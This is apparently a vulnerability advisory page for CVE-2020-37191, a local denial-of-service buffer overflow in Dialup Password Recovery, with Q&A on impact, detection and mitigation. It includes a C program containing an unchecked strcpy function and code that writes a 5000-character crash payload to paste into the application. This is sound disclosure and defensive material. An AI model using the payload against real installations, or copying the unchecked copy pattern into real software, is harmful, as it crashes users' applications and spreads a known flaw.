CVE-2020-37191
Denial of Service via Input Overflow in Dialup Password Recovery
Publication date: 2026-02-11
Last updated on: 2026-02-12
Assigner: VulnCheck
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| top_password_software | dialup_password_recovery | < 1.30 (up to, excluding) |
| top_password_software | dialup_password_recovery | 1.30 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-120 | The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2020-37191 is a denial of service vulnerability in Top Password Software Dialup Password Recovery version 1.30 and earlier. The software does not check the length of its input fields before copying them into fixed-size buffers (CWE-120), so a payload of about 5000 characters entered into the User Name or Registration Code field overflows the buffer.
This overflow causes the application to crash, making it unavailable to legitimate users.
How can this vulnerability impact me?
The primary impact of this vulnerability is a denial of service condition where the application crashes and becomes unusable.
An attacker with local access can trigger it by entering a crafted input of about 5000 characters into the User Name or Registration Code field, causing the software to crash.
This can disrupt normal operations that depend on the software, potentially causing downtime or loss of access to password recovery functionality.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by entering a large payload of approximately 5000 characters into the User Name and Registration Code input fields of the Top Password Software Dialup Password Recovery application. If the application crashes or becomes unresponsive, it indicates the presence of the vulnerability.
A practical detection method is to use a script or command that produces a 5000-character string (such as 5000 'A's), paste it into these fields and observe the application's behavior.
For example, a simple script can be used to generate the payload and write it to a file, which can then be used as input to the application to trigger the crash. [1, 2]
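The following C program is an added illustration, not code from Top Password Software or from this advisory. It shows the CWE-120 pattern named in the Exploitability table (an unchecked copy into a fixed-size buffer) beside a bounds-checked replacement, and it generates and writes the roughly 5000-character test payload described in the detection answer above. The 256-byte field width, the function names and the output file name `payload.txt` are assumptions for the example; the product's real buffer sizes are not published.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed field width for the example; the real product's buffer size is unknown. */
#define FIELD_MAX 256

/* CWE-120 pattern: copies src into a fixed-size dst without checking that it
 * fits. A 5000-byte source writes far past a FIELD_MAX-byte buffer and, as the
 * advisory describes, crashes the process. Never call this with untrusted input. */
void copy_field_unchecked(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Hardened version: rejects any input that does not fit together with its
 * terminating NUL. Returns 0 on success, -1 when the input is too long.
 * It refuses rather than truncating silently, so an oversized value cannot
 * reach later code looking like a valid (shorter) field. */
int copy_field_checked(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (dst_size == 0 || n >= dst_size)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Build the crash payload from the detection method: `len` 'A' characters,
 * NUL-terminated. The caller frees the result. */
char *make_payload(size_t len)
{
    char *p = malloc(len + 1);
    if (p == NULL)
        return NULL;
    memset(p, 'A', len);
    p[len] = '\0';
    return p;
}

/* Write the payload to a file so it can be pasted into the GUI field.
 * Returns 0 on success, -1 on any failure. */
int write_payload_file(const char *path, size_t len)
{
    char *p = make_payload(len);
    if (p == NULL)
        return -1;
    FILE *f = fopen(path, "wb");
    if (f == NULL) {
        free(p);
        return -1;
    }
    size_t written = fwrite(p, 1, len, f);
    fclose(f);
    free(p);
    return written == len ? 0 : -1;
}

int main(void)
{
    char username[FIELD_MAX];
    char *payload = make_payload(5000);
    if (payload == NULL)
        return 1;

    /* The checked copy refuses the oversized field instead of overflowing. */
    if (copy_field_checked(username, sizeof username, payload) != 0)
        printf("rejected %zu-byte input that would overflow a %d-byte buffer\n",
               strlen(payload), FIELD_MAX);

    /* copy_field_unchecked(username, payload);  <- the CWE-120 crash path */

    if (write_payload_file("payload.txt", 5000) == 0)
        printf("wrote 5000-byte payload to payload.txt\n");

    free(payload);
    return 0;
}
```

Paste the contents of `payload.txt` into the User Name or Registration Code field of the vulnerable build to reproduce the crash; in a fixed build the input should be rejected or truncated rather than terminating the process, which is the behaviour `copy_field_checked` models.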
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include avoiding excessively large inputs in the User Name and Registration Code fields, in particular inputs around 5000 characters, so the denial of service condition is not triggered.
Restrict access to the application to trusted users only, since the attack requires local access and user interaction.
Where the environment allows it, limit the size of the values that can reach the User Name and Registration Code fields to prevent the buffer overflow.
Check for any available patches or updates from the vendor and apply them as soon as they become available.